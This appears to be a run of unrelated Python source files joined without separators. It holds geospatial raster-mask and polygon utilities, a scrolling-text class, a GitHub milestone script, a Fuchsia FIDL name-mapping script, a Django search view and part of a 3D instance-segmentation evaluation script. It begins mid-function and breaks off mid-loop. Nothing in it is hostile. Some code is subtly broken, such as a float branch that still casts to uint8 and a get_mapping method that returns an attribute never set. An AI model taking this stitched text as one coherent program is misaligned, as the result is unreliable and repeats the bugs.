dst.write(output_arr, indexes=1) return output_arr def road_mask(df, width=4, meters=False, out_file=None, reference_im=None, geom_col='geometry', do_transform=None, affine_obj=None, shape=(900, 900), out_type='int', burn_value=255, burn_field=None, min_background_value=None, verbose=False): """Convert a dataframe of geometries to a pixel mask. Arguments --------- df : :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` A :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` instance with a column containing geometries (identified by `geom_col`). If the geometries in `df` are not in pixel coordinates, then `affine` or `reference_im` must be passed to provide the transformation to convert. width : `float` or `int`, optional The total width to make a road (i.e. twice x if using road.buffer(x)). In pixel units unless `meters` is ``True``. meters : bool, optional Should `width` be defined in units of meters? Defaults to no (``False``). If ``True`` and `df` is not in a CRS with metric units, the function will attempt to transform to the relevant CRS using ``df.to_crs()`` (if `df` is a :class:`geopandas.GeoDataFrame`) or using the data provided in `reference_im` (if not). out_file : str, optional Path to an image file to save the output to. Must be compatible with :class:`rasterio.DatasetReader`. If provided, a `reference_im` must be provided (for metadata purposes). reference_im : :class:`rasterio.DatasetReader` or `str`, optional An image to extract necessary coordinate information from: the affine transformation matrix, the image extent, etc. If provided, `affine_obj` and `shape` are ignored. geom_col : str, optional The column containing geometries in `df`. Defaults to ``"geometry"``. do_transform : bool, optional Should the values in `df` be transformed from geospatial coordinates to pixel coordinates? Defaults to ``None``, in which case the function attempts to infer whether or not a transformation is required based on the presence or absence of a CRS in `df`. If ``True``, either `reference_im` or `affine_obj` must be provided as a source for the the required affine transformation matrix. affine_obj : `list` or :class:`affine.Affine`, optional Affine transformation to use to convert from geo coordinates to pixel space. Only provide this argument if `df` is a :class:`geopandas.GeoDataFrame` with coordinates in a georeferenced coordinate space. Ignored if `reference_im` is provided. shape : tuple, optional An ``(x_size, y_size)`` tuple defining the pixel extent of the output mask. Ignored if `reference_im` is provided. out_type : 'float' or 'int' burn_value : `int` or `float`, optional The value to use for labeling objects in the mask. Defaults to 255 (the max value for ``uint8`` arrays). The mask array will be set to the same dtype as `burn_value`. Ignored if `burn_field` is provided. burn_field : str, optional Name of a column in `df` that provides values for `burn_value` for each independent object. If provided, `burn_value` is ignored. min_background_val : int Minimum value for mask background. Optional, ignore if ``None``. Defaults to ``None``. verbose : str, optional Switch to print relevant values. Defaults to ``False``. Returns ------- mask : :class:`numpy.array` A pixel mask with 0s for non-object pixels and `burn_value` at object pixels. `mask` dtype will coincide with `burn_value`. """ # start with required checks and pre-population of values if out_file and not reference_im: raise ValueError( 'If saving output to file, `reference_im` must be provided.') df = _check_df_load(df) if do_transform is None: # determine whether or not transform should be done do_transform = _check_do_transform(df, reference_im, affine_obj) df[geom_col] = df[geom_col].apply(_check_geom) # ensure WKTs are loaded buffered_df = buffer_df_geoms(df, width/2., meters=meters, reference_im=reference_im, geom_col=geom_col, affine_obj=affine_obj) if not do_transform: affine_obj = Affine(1, 0, 0, 0, 1, 0) # identity transform if reference_im: reference_im = _check_rasterio_im_load(reference_im) shape = reference_im.shape if do_transform: affine_obj = reference_im.transform # extract geometries and pair them with burn values if burn_field: if out_type == 'int': feature_list = list(zip(buffered_df[geom_col], buffered_df[burn_field].astype('uint8'))) else: feature_list = list(zip(buffered_df[geom_col], buffered_df[burn_field].astype('uint8'))) else: feature_list = list(zip(buffered_df[geom_col], [burn_value] * len(buffered_df))) output_arr = features.rasterize(shapes=feature_list, out_shape=shape, transform=affine_obj) if min_background_value: output_arr = np.clip(output_arr, min_background_value, np.max(output_arr)) if out_file: meta = reference_im.meta.copy() meta.update(count=1) if out_type == 'int': meta.update(dtype='uint8') with rasterio.open(out_file, 'w', **meta) as dst: dst.write(output_arr, indexes=1) return output_arr def buffer_df_geoms(df, buffer, meters=False, reference_im=None, geom_col='geometry', affine_obj=None): """Buffer geometries within a pd.DataFrame or gpd.GeoDataFrame. Arguments --------- df : :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` A :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` instance with a column containing geometries (identified by `geom_col`). If `df` lacks a ``crs`` attribute (isn't a :class:`geopandas.GeoDataFrame` ) and ``meters=True``, then `reference_im` must be provided for georeferencing. buffer : `int` or `float` The amount to buffer the geometries in `df`. In pixel units unless ``meters=True``. This corresponds to width/2 in mask creation functions. meters : bool, optional Should buffers be in pixel units (default) or metric units (if `meters` is ``True``)? reference_im : `str` or :class:`rasterio.DatasetReader`, optional The path to a reference image covering the same geographic extent as the area labeled in `df`. Provided for georeferencing of pixel coordinate geometries in `df` or conversion of georeferenced geometries to pixel coordinates as needed. Required if `meters` is ``True`` and `df` lacks a ``crs`` attribute. geom_col : str, optional The column containing geometries in `df`. Defaults to ``"geometry"``. affine_obj : `list` or :class:`affine.Affine`, optional Affine transformation to use to convert geoms in `df` from a geographic crs to pixel space. Only provide this argument if `df` is a :class:`geopandas.GeoDataFrame` with coordinates in a georeferenced coordinate space. Ignored if `reference_im` is provided. Returns ------- buffered_df : :class:`pandas.DataFrame` A :class:`pandas.DataFrame` in the original coordinate reference system with objects buffered per `buffer`. See Also -------- road_mask : Function to create road network masks. contact_mask : Function to create masks of contact points between polygons. """ if reference_im is not None: reference_im = _check_rasterio_im_load(reference_im) if hasattr(df, 'crs'): orig_crs = _check_crs(df.crs) else: orig_crs = None # will represent pixel crs # Check if dataframe is in the appropriate units and reproject if not if not meters: if hasattr(df, 'crs') and reference_im is not None: # if the df is georeferenced and a reference_im is provided, # use reference_im to transform df to px coordinates df_for_buffer = geojson_to_px_gdf(df.copy(), reference_im) elif hasattr(df, 'crs') and reference_im is None: df_for_buffer = affine_transform_gdf(df.copy(), affine_obj=affine_obj) else: # if it's already in px coordinates df_for_buffer = df.copy() else: # check if the df is in a metric crs if hasattr(df, 'crs'): if crs_is_metric(df): df_for_buffer = df.copy() else: df_for_buffer = reproject(df.copy()) # defaults to UTM else: # assume df is in px coords - use reference_im to georegister if reference_im is not None: df_for_buffer = georegister_px_df(df.copy(), im_path=reference_im) else: raise ValueError('If using `meters=True`, either `df` must be ' 'a geopandas GeoDataFrame or `reference_im` ' 'must be provided for georegistration.') df_for_buffer[geom_col] = df_for_buffer[geom_col].apply( lambda x: x.buffer(buffer)) # return to original crs if _check_crs(getattr(df_for_buffer, 'crs', None)) != orig_crs: if orig_crs is not None and \ getattr(df_for_buffer, 'crs', None) is not None: buffered_df = df_for_buffer.to_crs(orig_crs.to_wkt()) elif orig_crs is None: # but df_for_buffer has one: meters=True case buffered_df = geojson_to_px_gdf(df_for_buffer, reference_im) else: # orig_crs exists, but df_for_buffer doesn't have one buffered_df = georegister_px_df(df_for_buffer, im_path=reference_im, affine_obj=affine_obj, crs=orig_crs) else: buffered_df = df_for_buffer return buffered_df def preds_to_binary(pred_arr, channel_scaling=None, bg_threshold=0): """Convert a set of predictions from a neural net to a binary mask. Arguments --------- pred_arr : :class:`numpy.ndarray` A set of predictions generated by a neural net (generally in ``float`` dtype). This can be a 2D array or a 3D array, in which case it will be convered to a 2D mask output with optional channel scaling (see the `channel_scaling` argument). If a filename is provided instead of an array, the image will be loaded using scikit-image. channel_scaling : `list`-like of `float`s, optional If `pred_arr` is a 3D array, this argument defines how each channel will be combined to generate a binary output. channel_scaling should be a `list`-like of length equal to the number of channels in `pred_arr`. The following operation will be performed to convert the multi-channel prediction to a 2D output :: sum(pred_arr[channel]*channel_scaling[channel]) If not provided, no scaling will be performend and channels will be summed. bg_threshold : `int` or `float`, optional The cutoff to set to distinguish between background and foreground pixels in the final binary mask. Binarization takes place *after* channel scaling and summation (if applicable). Defaults to 0. Returns ------- mask_arr : :class:`numpy.ndarray` A 2D boolean ``numpy`` array with ``True`` for foreground pixels and ``False`` for background. """ pred_arr = _check_skimage_im_load(pred_arr).copy() if len(pred_arr.shape) == 3: if pred_arr.shape[0] < pred_arr.shape[-1]: pred_arr = np.moveaxis(pred_arr, 0, -1) if channel_scaling is None: # if scale values weren't provided channel_scaling = np.ones(shape=(pred_arr.shape[-1]), dtype='float') pred_arr = np.sum(pred_arr*np.array(channel_scaling), axis=-1) mask_arr = (pred_arr > bg_threshold).astype('uint8') return mask_arr*255 def mask_to_poly_geojson(pred_arr, channel_scaling=None, reference_im=None, output_path=None, output_type='geojson', min_area=40, bg_threshold=0, do_transform=None, simplify=False, tolerance=0.5, **kwargs): """Get polygons from an image mask. Arguments --------- pred_arr : :class:`numpy.ndarray` A 2D array of integers. Multi-channel masks are not supported, and must be simplified before passing to this function. Can also pass an image file path here. channel_scaling : :class:`list`-like, optional If `pred_arr` is a 3D array, this argument defines how each channel will be combined to generate a binary output. channel_scaling should be a `list`-like of length equal to the number of channels in `pred_arr`. The following operation will be performed to convert the multi-channel prediction to a 2D output :: sum(pred_arr[channel]*channel_scaling[channel]) If not provided, no scaling will be performend and channels will be summed. reference_im : str, optional The path to a reference geotiff to use for georeferencing the polygons in the mask. Required if saving to a GeoJSON (see the ``output_type`` argument), otherwise only required if ``do_transform=True``. output_path : str, optional Path to save the output file to. If not provided, no file is saved. output_type : ``'csv'`` or ``'geojson'``, optional If ``output_path`` is provided, this argument defines what type of file will be generated - a CSV (``output_type='csv'``) or a geojson (``output_type='geojson'``). min_area : int, optional The minimum area of a polygon to retain. Filtering is done AFTER any coordinate transformation, and therefore will be in destination units. bg_threshold : int, optional The cutoff in ``mask_arr`` that denotes background (non-object). Defaults to ``0``. simplify : bool, optional If ``True``, will use the Douglas-Peucker algorithm to simplify edges, saving memory and processing time later. Defaults to ``False``. tolerance : float, optional The tolerance value to use for simplification with the Douglas-Peucker algorithm. Defaults to ``0.5``. Only has an effect if ``simplify=True``. Returns ------- gdf : :class:`geopandas.GeoDataFrame` A GeoDataFrame of polygons. """ mask_arr = preds_to_binary(pred_arr, channel_scaling, bg_threshold) if do_transform and reference_im is None: raise ValueError( 'Coordinate transformation requires a reference image.') if do_transform: with rasterio.open(reference_im) as ref: transform = ref.transform crs = ref.crs ref.close() else: transform = Affine(1, 0, 0, 0, 1, 0) # identity transform crs = rasterio.crs.CRS() mask = mask_arr > bg_threshold mask = mask.astype('uint8') polygon_generator = features.shapes(mask_arr, transform=transform, mask=mask) polygons = [] values = [] # pixel values for the polygon in mask_arr for polygon, value in polygon_generator: p = shape(polygon).buffer(0.0) if p.area >= min_area: polygons.append(shape(polygon).buffer(0.0)) values.append(value) polygon_gdf = gpd.GeoDataFrame({'geometry': polygons, 'value': values}, crs=crs.to_wkt()) if simplify: polygon_gdf['geometry'] = polygon_gdf['geometry'].apply( lambda x: x.simplify(tolerance=tolerance) ) # save output files if output_path is not None: if output_type.lower() == 'geojson': if len(polygon_gdf) > 0: polygon_gdf.to_file(output_path, driver='GeoJSON') else: save_empty_geojson(output_path, polygon_gdf.crs.to_epsg()) elif output_type.lower() == 'csv': polygon_gdf.to_csv(output_path, index=False) return polygon_gdf def crs_is_metric(gdf): """Check if a GeoDataFrame's CRS is in metric units.""" units = str(gdf_get_projection_unit(gdf)).strip().lower() if units in ['"meter"', '"metre"', "'meter'", "'meter'", 'meter', 'metre']: return True else: return False def _check_do_transform(df, reference_im, affine_obj): """Check whether or not a transformation should be performed.""" try: crs = getattr(df, 'crs') except AttributeError: return False # if it doesn't have a CRS attribute if not crs: return False # return False for do_transform if crs is falsey elif crs and (reference_im is not None or affine_obj is not None): # if the input has a CRS and another obj was provided for xforming return True def instance_mask(df, out_file=None, reference_im=None, geom_col='geometry', do_transform=None, affine_obj=None, shape=(900, 900), out_type='int', burn_value=255, burn_field=None, nodata_value=0): """Convert a dataframe of geometries to a pixel mask. Arguments --------- df : :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` A :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` instance with a column containing geometries (identified by `geom_col`). If the geometries in `df` are not in pixel coordinates, then `affine` or `reference_im` must be passed to provide the transformation to convert. out_file : str, optional Path to an image file to save the output to. Must be compatible with :class:`rasterio.DatasetReader`. If provided, a `reference_im` must be provided (for metadata purposes). reference_im : :class:`rasterio.DatasetReader` or `str`, optional An image to extract necessary coordinate information from: the affine transformation matrix, the image extent, etc. If provided, `affine_obj` and `shape` are ignored. geom_col : str, optional The column containing geometries in `df`. Defaults to ``"geometry"``. do_transform : bool, optional Should the values in `df` be transformed from geospatial coordinates to pixel coordinates? Defaults to ``None``, in which case the function attempts to infer whether or not a transformation is required based on the presence or absence of a CRS in `df`. If ``True``, either `reference_im` or `affine_obj` must be provided as a source for the the required affine transformation matrix. affine_obj : `list` or :class:`affine.Affine`, optional Affine transformation to use to convert from geo coordinates to pixel space. Only provide this argument if `df` is a :class:`geopandas.GeoDataFrame` with coordinates in a georeferenced coordinate space. Ignored if `reference_im` is provided. shape : tuple, optional An ``(x_size, y_size)`` tuple defining the pixel extent of the output mask. Ignored if `reference_im` is provided. out_type : 'float' or 'int' burn_value : `int` or `float`, optional The value to use for labeling objects in the mask. Defaults to 255 (the max value for ``uint8`` arrays). The mask array will be set to the same dtype as `burn_value`. Ignored if `burn_field` is provided. burn_field : str, optional Name of a column in `df` that provides values for `burn_value` for each independent object. If provided, `burn_value` is ignored. nodata_value : `int` or `float`, optional The value to use for nodata pixels in the mask. Defaults to 0 (the min value for ``uint8`` arrays). Used if reference_im nodata value is a float. Ignored if reference_im nodata value is an int or if reference_im is not used. Take care when visualizing these masks, the nodata value may cause labels to not be visualized if nodata values are automatically masked by the software. Returns ------- mask : :class:`numpy.array` A pixel mask with 0s for non-object pixels and `burn_value` at object pixels. `mask` dtype will coincide with `burn_value`. """ # TODO: Refactor to remove some duplicated code here and in other mask fxns if out_file and not reference_im: raise ValueError( 'If saving output to file, `reference_im` must be provided.') df = _check_df_load(df) if len(df) == 0: # for saving an empty mask. reference_im = _check_rasterio_im_load(reference_im) shape = reference_im.shape return np.zeros(shape=shape, dtype='uint8') if do_transform is None: # determine whether or not transform should be done do_transform = _check_do_transform(df, reference_im, affine_obj) df[geom_col] = df[geom_col].apply(_check_geom) # load in geoms if wkt if not do_transform: affine_obj = Affine(1, 0, 0, 0, 1, 0) # identity transform if reference_im: reference_im = _check_rasterio_im_load(reference_im) shape = reference_im.shape if do_transform: affine_obj = reference_im.transform # extract geometries and pair them with burn values if burn_field: if out_type == 'int': feature_list = list(zip(df[geom_col], df[burn_field].astype('uint8'))) else: feature_list = list(zip(df[geom_col], df[burn_field].astype('float32'))) else: feature_list = list(zip(df[geom_col], [burn_value]*len(df))) if out_type == 'int': output_arr = np.empty(shape=(shape[0], shape[1], len(feature_list)), dtype='uint8') else: output_arr = np.empty(shape=(shape[0], shape[1], len(feature_list)), dtype='float32') # initialize the output array for idx, feat in enumerate(feature_list): output_arr[:, :, idx] = features.rasterize([feat], out_shape=shape, transform=affine_obj) if reference_im: reference_im = _check_rasterio_im_load(reference_im) try: bad_data_mask = (reference_im.read() == reference_im.nodata).any(axis=0) # take logical and along all dims so that all pixxels not -9999 across bands except AttributeError as ae: # raise another, more verbose AttributeError raise AttributeError("A nodata value is not defined for the source image. Make sure the reference_im has a nodata value defined.") from ae if len(bad_data_mask.shape) > 2: bad_data_mask = np.dstack([bad_data_mask]*output_arr.shape[2]) output_arr = np.where(bad_data_mask, 0, output_arr) # mask is broadcasted to filter labels where there are non-nan image values if out_file: meta = reference_im.meta.copy() meta.update(count=output_arr.shape[-1]) if out_type == 'int': meta.update(dtype='uint8') if isinstance(meta['nodata'], float): meta.update(nodata=nodata_value) with rasterio.open(out_file, 'w', **meta) as dst: for c in range(1, 1 + output_arr.shape[-1]): dst.write(output_arr[:, :, c-1], indexes=c) dst.close() return output_arr def geojsons_to_masks_and_fill_nodata(rtiler, vtiler, label_tile_dir, fill_value=0): """ Converts tiled vectors to raster labels and fills nodata values in raster and vector tiles. This function must be run after a raster tiler and vector tiler have already been initialized and the `.tile()` method for each has been called to generate raster and vector tiles. Geojson labels are first converted to rasterized masks, then the labels are set to 0 where the reference image, the corresponding image tile, has nodata values. Then, nodata areas in the image tile are filled in place with the fill_value. Only works for rasterizing all geometries as a single category with a burn value of 1. See test_tiler_fill_nodata in tests/test_tile/test_tile.py for an example. Args ------- rtiler : RasterTiler The RasterTiler that has had it's `.tile()` method called. vtiler : VectorTiler The VectorTiler that has had it's `.tile()` method called. label_tile_dir : str The folder path to save rasterized labels. This is created if it doesn't already exist. fill_value : str, optional The value to use to fill nodata values in images. Defaults to 0. Returns ------- rasterized_label_paths : list A list of the paths to the rasterized instance masks. """ rasterized_label_paths = [] print("starting label mask generation") if not os.path.exists(label_tile_dir): os.mkdir(label_tile_dir) for img_tile, geojson_tile in tqdm(zip(sorted(rtiler.tile_paths), sorted(vtiler.tile_paths))): fid = os.path.basename(geojson_tile).split(".geojson")[0] rasterized_label_path = os.path.join(label_tile_dir, fid + ".tif") rasterized_label_paths.append(rasterized_label_path) gdf = gpd.read_file(geojson_tile) # gdf.crs = rtiler.raster_bounds_crs # add this because gdfs can't be saved with wkt crs arr = instance_mask(gdf, out_file=rasterized_label_path, reference_im=img_tile, geom_col='geometry', do_transform=None, out_type='int', burn_value=1, burn_field=None) # this saves the file, unless it is empty in which case we deal with it below. if not arr.any(): # in case no instances in a tile we save it with "empty" at the front of the basename with rasterio.open(img_tile) as reference_im: meta = reference_im.meta.copy() reference_im.close() meta.update(count=1) meta.update(dtype='uint8') if isinstance(meta['nodata'], float): meta.update(nodata=0) rasterized_label_path = os.path.join(label_tile_dir, "empty_" + fid + ".tif") with rasterio.open(rasterized_label_path, 'w', **meta) as dst: dst.write(np.expand_dims(arr, axis=0)) dst.close() rtiler.fill_all_nodata(nodata_fill=fill_value) return rasterized_label_paths """ Class representing text that scrolls if it is too long. """ from Model import Time """ Class for scrolling text. """ class ScrollingText(): """ Creates the scrolling text. """ def __init__(self,text,maxLength,shiftTime,sideCharacter = "",scrollingSpacing=1): self.text = text self.maxLength = maxLength self.shiftTime = shiftTime self.startTime = Time.getCurrentTimestamp() self.sideCharacter = sideCharacter self.scrollingSpacing = scrollingSpacing """ Returns if the text fits. """ def textFits(self): return len(self.text) <= self.maxLength """ Returns the current text offset. """ def getCurrentOffset(self): if self.textFits(): return 0 else: return int(((Time.getCurrentTimestamp() - self.startTime) / self.shiftTime) % (len(self.text) + self.scrollingSpacing)) """ Returns the current string to display. """ def getCurrentText(self): if self.textFits(): # Center the text. signsBefore = int((self.maxLength - len(self.text)) / 2) signsAfter = self.maxLength - signsBefore - len(self.text) # Set the text. return (self.sideCharacter * signsBefore) + self.text + (self.sideCharacter * signsAfter) else: # Cut the text. doubleText = self.text + (" " * self.scrollingSpacing) + self.text offset = self.getCurrentOffset() return doubleText[offset:offset + self.maxLength]import os import requests import sys number = sys.argv[1] # Milestone number repo = os.environ['GITHUB_REPOSITORY'] # As in, user/repo token = os.environ['GITHUB_TOKEN'] # Github API token print( f"Fetching number of milestone {number} of repo '{repo}'", file = sys.stderr ) url = f'https://api.github.com/repos/{repo}/milestones/{number}' headers = { 'Accept': 'application/vnd.github.v3+json', 'Authorization': f'token {token}' } r = requests.get( url, headers = headers ) if r.status_code != 200: raise Exception( f"HTTP request failed: code {r.status_code}" ) r = r.json() open_issues = r['open_issues'] print( f"Open issues: {open_issues}", file = sys.stderr ) print( open_issues )#!/usr/bin/env python3.8 # Copyright 2021 The Fuchsia Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """A helper script for generating a map of FIDL mangled C++ function names to fully qualified APIs. The output of the script is used for correlating CTS C++ function coverage data (keyed by mangled function names) to FIDL APIs. """ import argparse import json import os import re import subprocess import sys # FIDL method name annotation exists 1-line before declaration. ANNOTATION_OFFSET = 1 class DwarfdumpStreamingParser: """Helper class to parse streaming output from `llvm-dwarfdump`.""" DWARF_TAG_MATCHER = re.compile(r'^(0x\S+):\s+(\S+)') SUBPROGRAM_ATTR_MATCHER = re.compile(r'^\s+(\S+)\s+\((.+)\)') SUBPROGRAM_TAG = 'DW_TAG_subprogram' def __init__(self): # Instance variables to track parser state from line to line. self._cur_addr = None self._in_subprogram_block = False # Dict of compilation unit addresses to their respective attributes. self._subprograms_dict = {} def parse_line(self, line): """Parses a line from `llvm-dwarfdump`'s output. Args: line (string): A line of `llvm-dwarfdump` output. """ if self._in_subprogram_block: m = self.SUBPROGRAM_ATTR_MATCHER.search(line) if m: attr, value = m.group(1), m.group(2) self._subprograms_dict[self._cur_addr][attr] = value else: # Dwarfdump entries are separated by a newline. # So the first unmatched line after entering a subprogram block # marks the end of the subprogram block. self._in_subprogram_block = False return m = self.DWARF_TAG_MATCHER.search(line) if m: addr, tag = m.group(1), m.group(2) if tag == self.SUBPROGRAM_TAG: self._in_subprogram_block = True self._cur_addr = addr self._subprograms_dict[self._cur_addr] = {} def get_subprograms(self): """Returns the subprograms that have been successfully parsed. Returns: A dict(string,dict) containing subprogram addresses and respective dwarfdump attributes. """ return self._subprograms_dict class FidlApiResolver: """Helper class to resolve mangled C++ function names to corresponding FIDL APIs. For each mangled C++ function that's associated with a `fidl.h` file, we use information provided in dwarfdump's output to navigate to where the function is declared in the generated source file (FIDL binding header file). Once there, we can simply read the Fully-Qualified FIDL API name annotation that's set a fixed number of lines above where the function is declared. Args: subprograms_dict (dict(string,dict)): Dict containing subprogram addresses and dwarfdump attributes. api_mapping_dict (dict(string,string)): Dict containing mapping between mangled function names and fully qualified FIDL names. """ def __init__(self, subprograms_dict, api_mapping_dict): self._subprograms_dict = subprograms_dict self._api_mapping_dict = api_mapping_dict def add_new_mappings(self): """Add new mangled_name to FIDL API mapping if it doesn't already exist. New mappings are added to `self._api_mapping_dict`. """ for _, info in self._subprograms_dict.items(): # Only care about subprograms with file and line number information. if 'DW_AT_decl_file' not in info or 'DW_AT_decl_line' not in info: continue # Only process FIDL binding headers. if not info['DW_AT_decl_file'].endswith('fidl.h"'): continue mangled_name = info.get('DW_AT_linkage_name') or info.get( 'DW_AT_name') if not mangled_name: # Ignore subprograms with no names. continue sanitized_mangled_name = mangled_name.strip('"') if sanitized_mangled_name not in self._api_mapping_dict: sanitized_filepath = info['DW_AT_decl_file'].strip('"') line_num = int(info['DW_AT_decl_line']) self._add_mapping_entry( sanitized_mangled_name, sanitized_filepath, line_num) def _add_mapping_entry(self, mangled_name, filepath, line_num): """Resolve mangled_name to FIDL API mapping and add as mapping entry. Resolve mapping by opening the file where the function is defined, and reading an annotation that's a fixed-number of lines above the line of function declaration. Args: mangled_name (string): Mangled C++ function name to map to a FIDL API. filepath (string): Path to generated FIDL binding file that declares the function related to the `mangled_name`. line_num (int): The line number in the FIDL binding file where the function is declared. """ fidl_api_annotation = '' cur_line = 0 with open(filepath) as f: while cur_line != line_num - ANNOTATION_OFFSET: fidl_api_annotation = f.readline().strip() cur_line += 1 if 'cts-coverage-fidl-name' not in fidl_api_annotation: # This is not a FIDL API of interest. return # Annotation format: "// cts-coverage-fidl-name:" self._api_mapping_dict[mangled_name] = fidl_api_annotation.split(':')[1] def get_mapping(self): """Returns the mangled-name-to-FIDL-API mapping. Returns: A dict(str,str) containing mangled function names and their corresponding fully qualified FIDL API names. """ return self._mapping def main(): parser = argparse.ArgumentParser() parser.add_argument( '--input', help= 'File that contains filepaths to unstripped libraries & executables relative to the build dir.', required=True) parser.add_argument( '--output', help='Path to the output file containing FIDL to mangled name mapping.', required=True) parser.add_argument( '--depfile', help='Path to the depfile generated for GN.', required=True) parser.add_argument( '--dwarfdump', help='Path to `llvm-dwarfdump` executable.', required=True) args = parser.parse_args() depfile_inputs = [] with open(args.input) as f: depfile_inputs = f.read().splitlines() # Write depfile. with open(args.depfile, 'w') as f: f.write('%s: %s' % (args.output, ' '.join(sorted(depfile_inputs)))) # Generate mapping. fidl_mangled_name_to_api_mapping = {} for unstripped_binary in depfile_inputs: dwarddump_cmd = [args.dwarfdump, unstripped_binary] parser = DwarfdumpStreamingParser() # TODO(chok): Add multithreaded support for concurrently processing each unstripped binary. with subprocess.Popen(dwarddump_cmd, stdout=subprocess.PIPE) as p: for line in p.stdout: parser.parse_line(line.decode()) resolver = FidlApiResolver( parser.get_subprograms(), fidl_mangled_name_to_api_mapping) resolver.add_new_mappings() # Write output. with open(args.output, 'w') as f: f.write(json.dumps(fidl_mangled_name_to_api_mapping, indent=2)) if __name__ == '__main__': sys.exit(main()) digitalfabrik/buergerinnendatenfinderdatenfinder/gui/views.py from django.shortcuts import render from .forms import CitizenDateForm from .models import CitizenDate DATE_TYPES = { 'telephone': 'Telefonnummer', 'e-mail': 'E-Mail-Adresse', 'zipcode': 'Postleitzahl', } def index(request): context = {} if request.method == "POST": cdf = CitizenDateForm( request.POST ) if cdf.is_valid(): cdf.save() else: print(cdf.type_hash) cd = CitizenDate.objects.filter(type_hash=cdf.type_hash) context["date_type"] = DATE_TYPES[request.POST["date_type"]] context["cd"] = cd context["all_data"] = CitizenDate.objects.filter() context["citizen_date_form"] = CitizenDateForm() return render(request, "search.html", context) hierplace/__init__.py from .HierPlace import hier_place # Evaluates semantic instance task # Adapted from the CityScapes evaluation: https://github.com/mcordts/cityscapesScripts/tree/master/cityscapesscripts/evaluation # Input: # - path to .txt prediction files # - path to .txt ground truth files # - output file to write results to # Each .txt prediction file look like: # [(pred0) rel. path to pred. mask over verts as .txt] [(pred0) label id] [(pred0) confidence] # [(pred1) rel. path to pred. mask over verts as .txt] [(pred1) label id] [(pred1) confidence] # [(pred2) rel. path to pred. mask over verts as .txt] [(pred2) label id] [(pred2) confidence] # ... # # NOTE: The prediction files must live in the root of the given prediction path. # Predicted mask .txt files must live in a subfolder. # Additionally, filenames must not contain spaces. # The relative paths to predicted masks must contain one integer per line, # where each line corresponds to vertices in the *_vh_clean_2.ply (in that order). # Non-zero integers indicate part of the predicted instance. # The label ids specify the class of the corresponding mask. # Confidence is a float confidence score of the mask. # # Note that only the valid classes are used for evaluation, # i.e., any ground truth label not in the valid label set # is ignored in the evaluation. # # example usage: evaluate_semantic_instance.py --scan_path [path to scan data] --output_file [output file] # python imports import math import os, sys, argparse import inspect from copy import deepcopy try: import numpy as np except: print("Failed to import numpy package.") sys.exit(-1) currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) parentdir = os.path.dirname(currentdir) sys.path.insert(0,parentdir) import util import util_3d parser = argparse.ArgumentParser() parser.add_argument('--pred_path', required=True, help='path to directory of predicted .txt files') parser.add_argument('--gt_path', required=True, help='path to directory of gt .txt files') parser.add_argument('--output_file', default=None, help='optional output file') opt = parser.parse_args() # ---------- Label info ---------- # CLASS_LABELS = ['wall','floor','cabinet','bed','chair','sofa','table','door','window','bookshelf','picture','counter','blinds','desk','shelves','curtain','dresser','pillow','mirror','floor_mat','clothes','ceiling','books','refridgerator','television','paper','towel','shower_curtain','box','whiteboard','person','night_stand','toilet','sink','lamp','bathtub','bag','otherstructure','otherfurniture','otherprop'] VALID_CLASS_IDS = np.array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40 ]) ID_TO_LABEL = {} LABEL_TO_ID = {} for i in range(len(VALID_CLASS_IDS)): LABEL_TO_ID[CLASS_LABELS[i]] = VALID_CLASS_IDS[i] ID_TO_LABEL[VALID_CLASS_IDS[i]] = CLASS_LABELS[i] # ---------- Evaluation params ---------- # # overlaps for evaluation opt.overlaps = np.append(np.arange(0.5,0.95,0.05), 0.25) # minimum region size for evaluation [verts] opt.min_region_sizes = np.array( [ 100 ] ) # distance thresholds [m] opt.distance_threshes = np.array( [ float('inf') ] ) # distance confidences opt.distance_confs = np.array( [ -float('inf') ] ) def evaluate_matches(matches): overlaps = opt.overlaps min_region_sizes = [ opt.min_region_sizes[0] ] dist_threshes = [ opt.distance_threshes[0] ] dist_confs = [ opt.distance_confs[0] ] # results: class x overlap ap = np.zeros( (len(dist_threshes) , len(CLASS_LABELS) , len(overlaps)) , np.float ) for di, (min_region_size, distance_thresh, distance_conf) in enumerate(zip(min_region_sizes, dist_threshes, dist_confs)): for oi, overlap_th in enumerate(overlaps): pred_visited = {} for m in matches: for p in matches[m]['pred']: for label_name in CLASS_LABELS: for p in matches[m]['pred'][label_name]: if 'filename' in p: pred_visited[p['filename']] = False for li, label_name in enumerate(CLASS_LABELS): y_true = np.empty(0) y_score = np.empty(0) hard_false_negatives = 0 has_gt = False has_pred = False for m in matches: pred_instances = matches[m]['pred'][label_name] gt_instances = matches[m]['gt'][label_name] # filter groups in ground truth gt_instances = [ gt for gt in gt_instances if gt['instance_id']>=1000 and gt['vert_count']>=min_region_size and gt['med_dist']<=distance_thresh and gt['dist_conf']>=distance_conf ] if gt_instances: has_gt = True if pred_instances: has_pred = True cur_true = np.ones ( len(gt_instances) ) cur_score = np.ones ( len(gt_instances) ) * (-float("inf")) cur_match = np.zeros( len(gt_instances) , dtype=np.bool ) # collect matches for (gti,gt) in enumerate(gt_instances): found_match = False # num_pred = len(gt['matched_pred']) for pred in gt['matched_pred']: # greedy assignments if pred_visited[pred['filename']]: continue overlap = float(pred['intersection']) / (gt['vert_count']+pred['vert_count']-pred['intersection']) if overlap > overlap_th: confidence = pred['confidence'] # if already have a prediction for this gt, # the prediction with the lower score is automatically a false positive if cur_match[gti]: max_score = max( cur_score[gti] , confidence ) min_score = min( cur_score[gti] , confidence ) cur_score[gti] = max_score # append false positive cur_true = np.append(cur_true,0) cur_score = np.append(cur_score,min_score) cur_match = np.append(cur_match,True) # otherwise set score else: found_match = True cur_match[gti] = True cur_score[gti] = confidence pred_visited[pred['filename']] = True if not found_match: hard_false_negatives += 1 # remove non-matched ground truth instances cur_true = cur_true [ cur_match==True ] cur_score = cur_score[ cur_match==True ] # collect non-matched predictions as false positive for pred in pred_instances: found_gt 